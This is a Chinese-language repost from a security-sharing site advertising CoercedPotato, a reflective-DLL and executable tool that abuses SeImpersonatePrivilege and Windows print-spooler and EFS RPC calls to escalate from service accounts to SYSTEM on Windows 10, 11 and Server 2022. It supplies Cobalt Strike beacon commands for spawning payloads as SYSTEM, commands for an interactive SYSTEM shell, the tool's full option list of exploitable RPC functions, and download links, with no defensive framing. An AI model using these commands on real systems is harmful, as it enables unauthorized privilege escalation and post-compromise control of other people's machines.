CoercedPotato反射DLL利用工具

admin 2024年6月29日09:53:24评论4 views字数 1862阅读6分12秒阅读模式
项目简介

通过在Windows 10、Windows 11和Server 2022上滥用SeImpersonatePrivilege特权和MS-RPRN函数将LOCAL/NETWORK SERVICE提升为SYSTEM。
工具使用

一、cna插件利用

克隆此存储库并在VisualStudio中编译项目,然后到CobaltStrike中加载dist/coercedpotato.cna

首先需要使用RPC侦听器生成
beacon> CoercedPotato spawn ProcessToSpawn OptionalCmdArgument例如:beacon> CoercedPotato spawn C:WindowsTempbeacon.exebeacon> CoercedPotato spawn C:WindowsTemploader.exe C:WindowsTempbeacon.bin
然后你可以触发一个SYSTEM调用
beacon> CoercedPotato coerce
CoercedPotato反射DLL利用工具

二、exe落地利用

非常快速POC.CoercedPotato.exe -c whoami交互式shellPoC.CoercedPotato.exe -c cmd.exe
CoercedPotato反射DLL利用工具

可以使用--help选项检查帮助消息。

CoercedPotato is an automated tool for privilege escalation exploit using SeImpersonatePrivilege or SeImpersonatePrimaryToken.Usage: .CoercedPotato.exe [OPTIONS]Options:  -h,--help                   Print this help message and exit  -c,--command TEXT REQUIRED  Program to execute as SYSTEM (i.e. cmd.exe)  -i,--interface TEXT         Optionnal interface to use (default : ALL) (Possible values : ms-rprn, ms-efsr  -n,--exploitId INT          Optionnal exploit ID (Only usuable if interface is defined)                                -> ms-rprn :                                  [0] RpcRemoteFindFirstPrinterChangeNotificationEx()                                 [1] RpcRemoteFindFirstPrinterChangeNotification()                               -> ms-efsr                                  [0] EfsRpcOpenFileRaw()                                 [1] EfsRpcEncryptFileSrv()                                 [2] EfsRpcDecryptFileSrv()                                 [3] EfsRpcQueryUsersOnFile()                                 [4] EfsRpcQueryRecoveryAgents()                                 [5] EfsRpcRemoveUsersFromFile()                                 [6] EfsRpcAddUsersToFile()                                 [7] EfsRpcFileKeyInfo() # NOT WORKING                                 [8] EfsRpcDuplicateEncryptionInfoFile()                                 [9] EfsRpcAddUsersToFileEx()                                 [10] EfsRpcFileKeyInfoEx() # NOT WORKING                                 [11] EfsRpcGetEncryptedFileMetadata()                                 [12] EfsRpcEncryptFileExSrv()                                 [13] EfsRpcQueryProtectors()  -f,--force BOOLEAN          Force all RPC functions even if it says 'Exploit worked!' (Default value : false)  --interactive BOOLEAN       Set wether the process should be run within the same shell or open a new window. (Default value : true)

下载地址

https://github.com/Prepouce/CoercedPotatohttps://github.com/sokaRepo/CoercedPotatoRDLL

https://github.com/Prepouce/CoercedPotatohttps://github.com/sokaRepo/CoercedPotatoRDLL

原文始发于微信公众号(Hack分享吧):CoercedPotato反射DLL利用工具

 

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年6月29日09:53:24
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CoercedPotato反射DLL利用工具http://cn-sec.com/archives/2898869.html

发表评论

匿名网友 填写信息